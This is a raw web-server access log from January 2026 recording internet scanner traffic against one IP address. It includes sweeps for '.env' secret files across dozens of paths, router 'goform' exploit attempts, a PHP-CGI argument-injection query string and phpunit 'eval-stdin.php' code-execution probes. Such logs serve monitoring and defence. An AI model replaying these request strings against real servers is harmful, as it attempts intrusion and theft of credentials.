+0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:21:13:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:21:15:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 14.135.75.20] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:21:15:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 171.37.190.61] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[12/Jan/2026:21:15:09 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[12/Jan/2026:21:20:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:21:40:04 +0000] 400 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:21:42:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:22:09:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:22:10:11 +0000] 400 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:22:11:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:22:22:47 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:22:33:10 +0000] 400 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:22:33:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:22:37:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.252.89.75] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:22:54:55 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:22:54:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:22:55:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 20.118.227.29] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[12/Jan/2026:22:55:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:22:58:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:23:05:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 45.139.104.168] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; Pixel 3a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" "-" +[12/Jan/2026:23:24:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:23:26:03 +0000] 404 - GET http 92.249.249.197 "/developmentserver/metadatauploader" [Client 52.180.159.71] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[12/Jan/2026:23:41:29 +0000] 400 - - http localhost "-" [Client 194.165.16.167] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:23:48:19 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197/home.asp" +[12/Jan/2026:23:49:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:23:49:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:23:54:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:00:13:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:00:18:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 47.254.207.44] [Length 1033] [Gzip -] "curl/7.64.1" "-" +[13/Jan/2026:00:19:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.204] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:00:19:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.204] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:00:19:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 37.19.216.146] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[13/Jan/2026:00:19:38 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:00:20:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.93.251.137] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:00:38:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:00:46:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:00:49:54 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197/home.asp" +[13/Jan/2026:01:04:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:01:12:20 +0000] 404 - GET http 92.249.249.197 "/index.asp" [Client 204.76.203.20] [Length 122] [Gzip 1.35] "Hello World/1.0" "-" +[13/Jan/2026:01:15:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:01:15:43 +0000] 400 - GET http 92.249.249.197 "/" [Client 20.163.34.41] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[13/Jan/2026:01:15:43 +0000] 400 - - http localhost "-" [Client 20.163.34.41] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:01:25:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:01:25:27 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[13/Jan/2026:01:28:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:01:33:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:01:37:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:01:53:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:01:53:43 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61" "-" +[13/Jan/2026:01:53:45 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 ( .NET CLR 3.5.30729)" "-" +[13/Jan/2026:01:53:45 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.80 (Linux mips; U; ; en) Presto/2.10.287 Version/12.00" "-" +[13/Jan/2026:01:53:45 +0000] 404 - GET http 92.249.249.197 "/app/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; fr-fr; GT-N7000 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[13/Jan/2026:01:53:46 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SCH-R530M Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[13/Jan/2026:01:53:46 +0000] 404 - GET http 92.249.249.197 "/demo/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" "-" +[13/Jan/2026:01:53:47 +0000] 404 - GET http 92.249.249.197 "/dev/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36" "-" +[13/Jan/2026:01:53:47 +0000] 404 - GET http 92.249.249.197 "/staging/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC_Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[13/Jan/2026:01:53:47 +0000] 404 - GET http 92.249.249.197 "/mail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 10.0; Win64; x64) Presto/2.12.388 Version/38.0" "-" +[13/Jan/2026:01:53:47 +0000] 404 - GET http 92.249.249.197 "/m/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/18.0.1" "-" +[13/Jan/2026:01:53:48 +0000] 404 - GET http 92.249.249.197 "/remote/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8) Gecko/20060104 Firefox/1.5" "-" +[13/Jan/2026:01:53:48 +0000] 404 - GET http 92.249.249.197 "/webmail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5" "-" +[13/Jan/2026:01:53:48 +0000] 404 - GET http 92.249.249.197 "/server/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MDDCJS)" "-" +[13/Jan/2026:01:53:49 +0000] 404 - GET http 92.249.249.197 "/vpn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1" "-" +[13/Jan/2026:01:53:49 +0000] 404 - GET http 92.249.249.197 "/secure/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52" "-" +[13/Jan/2026:01:53:49 +0000] 404 - GET http 92.249.249.197 "/shop/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "-" +[13/Jan/2026:01:53:50 +0000] 404 - GET http 92.249.249.197 "/cloud/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)" "-" +[13/Jan/2026:01:53:50 +0000] 404 - GET http 92.249.249.197 "/portal/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" "-" +[13/Jan/2026:01:53:50 +0000] 404 - GET http 92.249.249.197 "/host/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SPH-L300 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher" "-" +[13/Jan/2026:01:53:51 +0000] 404 - GET http 92.249.249.197 "/support/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.21 (Windows NT 5.1; U; en)" "-" +[13/Jan/2026:01:53:51 +0000] 404 - GET http 92.249.249.197 "/pop/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.50; Windows NT; SiteKiosk 4.8)" "-" +[13/Jan/2026:01:53:52 +0000] 404 - GET http 92.249.249.197 "/store/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 9; SM-G960F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.157 Mobile Safari/537.36" "-" +[13/Jan/2026:01:53:52 +0000] 404 - GET http 92.249.249.197 "/cdn/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4" "-" +[13/Jan/2026:01:53:53 +0000] 404 - GET http 92.249.249.197 "/dashboard/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)" "-" +[13/Jan/2026:01:53:53 +0000] 404 - GET http 92.249.249.197 "/test/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 OPR/51.0" "-" +[13/Jan/2026:01:53:54 +0000] 404 - GET http 92.249.249.197 "/smtp/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.23 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru)" "-" +[13/Jan/2026:01:53:54 +0000] 404 - GET http 92.249.249.197 "/ftp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" "-" +[13/Jan/2026:01:53:54 +0000] 404 - GET http 92.249.249.197 "/wiki/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36 OPR/37.0.2178.32" "-" +[13/Jan/2026:01:53:54 +0000] 404 - GET http 92.249.249.197 "/help/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.898" "-" +[13/Jan/2026:01:53:55 +0000] 404 - GET http 92.249.249.197 "/blog/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SAMSUNG-SGH-I317 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[13/Jan/2026:01:59:53 +0000] 400 - GET http 92.249.249.197 "/" [Client 162.142.125.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:01:59:57 +0000] 400 - - http localhost "-" [Client 162.142.125.114] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:02:00:07 +0000] 400 - GET http 92.249.249.197 "/sitemap.xml" [Client 162.142.125.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:02:07:20 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[13/Jan/2026:02:20:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:02:27:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:02:45:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:02:51:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:03:05:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 54.176.227.68] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" +[13/Jan/2026:03:10:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:03:15:14 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "-" +[13/Jan/2026:03:15:15 +0000] 404 - GET http 92.249.249.197 "/.env.private" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera 9.7 (Windows NT 5.2; U; en)" "-" +[13/Jan/2026:03:15:15 +0000] 404 - GET http 92.249.249.197 "/.env-ids.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows ME 4.9; rv:35.0) Gecko/20100101 Firefox/35.0" "-" +[13/Jan/2026:03:15:16 +0000] 404 - GET http 92.249.249.197 "/.env-preview" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36" "-" +[13/Jan/2026:03:22:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:03:24:27 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.137.73.221] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[13/Jan/2026:03:26:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:03:32:00 +0000] 400 - - http localhost "-" [Client 3.137.73.221] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:03:36:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:03:36:39 +0000] 400 - GET http 92.249.249.197 "/" [Client 162.142.125.219] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:03:36:39 +0000] 400 - - http localhost "-" [Client 162.142.125.219] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:03:36:46 +0000] 400 - GET http 92.249.249.197 "/.well-known/security.txt" [Client 162.142.125.219] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:03:39:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[13/Jan/2026:03:47:11 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[13/Jan/2026:03:47:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:04:00:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:04:08:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 165.227.157.247] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[13/Jan/2026:04:08:08 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:04:08:08 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 165.227.157.247] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:04:08:11 +0000] 400 - GET http 92.249.249.197 "/" [Client 142.93.62.136] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[13/Jan/2026:04:18:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:04:18:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:04:23:55 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 42.240.131.227] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:04:23:55 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 42.240.131.227] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:04:23:55 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:56 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 42.240.131.227] [Length 154] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:57 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:57 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:58 +0000] 404 - GET http 92.249.249.197 